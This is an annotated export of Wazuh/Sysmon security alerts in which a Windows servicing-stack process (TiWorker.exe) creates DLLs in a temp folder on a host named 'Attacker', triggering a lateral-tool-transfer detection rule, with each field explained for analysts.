data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1426878Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260596 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.140
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\turbostack.dll
CreationUtcTime: 2025-04-20 01:55:28.140
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.140 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\turbostack.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.140 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.661366 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1533935Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260597 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.152
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\updateagent.dll
CreationUtcTime: 2025-04-20 01:55:28.152
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\updateagent.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.664347 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1725412Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260598 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.170
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\UpdateCompression.dll
CreationUtcTime: 2025-04-20 01:55:28.170
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.170 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\UpdateCompression.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.170 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.667352 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1824317Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260600 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.180
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wcp.dll
CreationUtcTime: 2025-04-20 01:55:28.180
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.180 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wcp.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.180 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.670301 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2039426Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260601 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.202
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wdscore.dll
CreationUtcTime: 2025-04-20 01:55:28.202
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.202 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wdscore.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.202 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.673266 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2071612Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260602 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.205
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wimgapi.dll
CreationUtcTime: 2025-04-20 01:55:28.205
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.205 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wimgapi.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.205 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.676231 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2133548Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260603 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.212
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wrpint.dll
CreationUtcTime: 2025-04-20 01:55:28.212
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wrpint.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
